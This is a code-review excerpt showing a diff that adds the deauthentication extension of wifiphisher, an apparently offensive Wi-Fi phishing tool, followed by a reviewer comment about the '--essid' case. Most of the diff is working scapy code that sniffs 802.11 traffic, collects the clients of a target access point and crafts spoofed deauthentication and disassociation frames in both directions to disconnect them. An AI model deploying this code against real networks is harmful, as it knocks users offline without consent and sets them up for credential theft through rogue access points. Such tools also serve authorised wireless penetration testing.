wifiphisher/extensions/deauth.py

```diff
@@ -0,0 +1,137 @@
+        :param receiver: The MAC address of the receiver
+        :type self: Deauthentication
+        :type sender: string
+        :type receiver: string
+        :return: None
+        :rtype: None
+        """
+
+        deauth_packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=12, \
+                    addr1=receiver, addr2=sender, addr3=self._data["target_ap_bssid"]) \
+                  / dot11.Dot11Deauth())
+
+        disassoc_packet = (dot11.RadioTap() / dot11.Dot11(type=0, subtype=10, \
+                    addr1=receiver, addr2=sender, addr3=self._data["target_ap_bssid"]) \
+                  / dot11.Dot11Disas())  
+
+        return [disassoc_packet, deauth_packet]
+
+    def get_packet(self, packet):
+        """
+        Process the Dot11 packets and add any desired clients to observed_clients.
+
+        :param self: A Deauthentication object.
+        :param packet: A scapy.layers.RadioTap object.
+        :type self: Deauthentication
+        :type packet: scapy.layers.RadioTap
+        :return: list with the crafted Deauth/Disas packets
+        :rtype: list
+        .. note: addr1 = Destination address
+                 addr2 = Sender address
+                 Also this finds devices that are not associated with any
+                 access point as they respond to the access point probes.
+        """
+
+        deauth_pkts = []
+
+        # check if the packet has a dot11 layer
+        if packet.haslayer(dot11.Dot11):
+            # get the sender and receiver
+            receiver = packet.addr1
+            sender = packet.addr2
+
+            # create a list of addresses that are not acceptable
+            non_valid_list = self._non_client_addresses + self._observed_clients
+
+            # if sender or receirver is valid and not already a
+            # discovered client check to see if either one is a client
+            if receiver not in non_valid_list and sender not in non_valid_list:
+                # in case the receiver is the access point
+                if receiver == self._data["target_ap_bssid"]:
+                    # add the sender to the client list
+                    self._observed_clients.append(sender)
+
+                    # create and add deauthentication packets for client
+                    deauth_pkts += self._craft_packet(sender, self._data["target_ap_bssid"])
+                    deauth_pkts += self._craft_packet(self._data["target_ap_bssid"], sender)
+
+                # in case the sender is the access point
+                elif sender == self._data["target_ap_bssid"]:
+                    # add the receiver to the client list
+                    self._observed_clients.append(receiver)
+
+                    # create and add deauthentication packets for client
+                    deauth_pkts += self._craft_packet(receiver, self._data["target_ap_bssid"])
+                    deauth_pkts += self._craft_packet(self._data["target_ap_bssid"], receiver)
+
```

Comment:
Still need to consider the `--essid` case since in this case deauth is sending for all the clients and aps.
I already have a PR for that, just for reference here #600 :)